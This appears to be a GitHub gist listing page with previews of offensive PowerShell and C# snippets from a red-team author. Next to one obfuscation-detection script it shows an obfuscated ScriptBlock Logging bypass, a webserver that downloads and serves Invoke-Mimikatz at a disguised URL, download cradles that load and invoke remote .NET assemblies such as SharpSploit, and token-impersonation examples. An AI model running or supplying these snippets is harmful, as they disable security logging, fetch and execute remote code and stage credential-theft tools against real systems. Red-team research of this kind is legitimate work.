cobbr
/ Invoke-ObfuscationDetection.ps1
Last active
September 17, 2024 21:54
Detect obfuscated PowerShell through character frequency analysis.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Measure-CharacterFrequency | |
| { | |
| <# | |
| .SYNOPSIS | |
| Measures the letter / character frequency in a block of text, ignoring whitespace | |
| and PowerShell comment blocks. | |
| Author: Lee Holmes |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # ScriptBlock Logging Bypass | |
| # @cobbr_io | |
| $GroupPolicyField = [ref].Assembly.GetType('System.Management.Automation.Utils')."GetFie`ld"('cachedGroupPolicySettings', 'N'+'onPublic,Static') | |
| If ($GroupPolicyField) { | |
| $GroupPolicyCache = $GroupPolicyField.GetValue($null) | |
| If ($GroupPolicyCache['ScriptB'+'lockLogging']) { | |
| $GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0 | |
| $GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0 | |
| } |
cobbr
/ server.ps1
Last active
January 30, 2020 18:55
— forked from obscuresec/dirtywebserver.ps1
Dirty PowerShell Webserver
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $mk = (new-object net.webclient).downloadstring("https://github.com/PowerShellMafia/PowerSploit/raw/master/Exfiltration/Invoke-Mimikatz.ps1") | |
| $Hso = New-Object Net.HttpListener | |
| $Hso.Prefixes.Add("http://+:8080/") | |
| $Hso.Start() | |
| While ($Hso.IsListening) { | |
| $HC = $Hso.GetContext() | |
| $HRes = $HC.Response | |
| $HRes.Headers.Add("Content-Type","text/plain") | |
| If (($HC.Request).RawUrl -eq '/home/news/a/21/article.html') { | |
| $Buf = [Text.Encoding]::UTF8.GetBytes($mk) |
cobbr
/ DotnetAssemblyDownloadCradle.cs
Created
June 20, 2018 22:37
A download cradle for .NET assemblies.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| public class Program { public static void Main(string[] args) { System.Reflection.Assembly.Load(new System.Net.WebClient().DownloadData(args[0])).GetTypes()[0].GetMethods()[0].Invoke(0, null); } } |
cobbr
/ reflection-example-1
Created
November 6, 2018 15:46
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| PS > [System.Reflection.Assembly]::Load([System.IO.File]::ReadAllBytes("SharpSploit.dll").GetType("SharpSploit.Execution.Shell").GetMethod("ShellExecute").Invoke(0, @("whoami", "", "", "")) | |
| desktop-f9dq76g\cobbr |
cobbr
/ reflection-example-2
Created
November 6, 2018 15:47
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| PS > [System.Reflection.Assembly]::Load((new-object net.webclient).DownloadData("https://example.com/SharpSploit.dll").GetType("SharpSploit.Execution.Shell").GetMethod("ShellExecute").Invoke(0, @("whoami", "", "", "")) | |
| desktop-f9dq76g\cobbr |
cobbr
/ reflection-example-3
Created
November 6, 2018 15:48
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| public class Program { | |
| public static void Main() { | |
| System.Reflection.Assembly.Load(new System.Net.WebClient().DownloadData("https://example.com/SharpSploit.dll")).GetType("SharpSploit.Execution.Shell").GetMethod("ShellExecute").Invoke(0, @("whoami", "", "", "")); | |
| } | |
| } |
cobbr
/ sharpsploit-resources-example
Created
November 6, 2018 15:49
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <ItemGroup> | |
| <!-- <EmbeddedResource Include="Resources\powerkatz_x86.dll" /> --> | |
| <!-- <EmbeddedResource Include="Resources\powerkatz_x64.dll" /> --> | |
| </ItemGroup> |
cobbr
/ sharpsploit-example-1
Created
November 6, 2018 15:50
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using SharpSploit.Enumeration; | |
| public class Program { | |
| static void Main() { | |
| Console.WriteLine( Net.GetNetLocalGroupMembers(Domain.GetDomainComputers())); | |
| return; | |
| } | |
| } |
cobbr
/ sharpsploit-example-2
Created
November 6, 2018 15:51
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using SharpSploit.Credentials; | |
| public class Program { | |
| static void Main() { | |
| using (Tokens t = new Tokens()) | |
| { | |
| string whoami = t.RunAs("Username", ".", "Password123!", ()=> | |
| { | |
| return t.WhoAmI(); | |
| }); | |
| } |
OlderNewer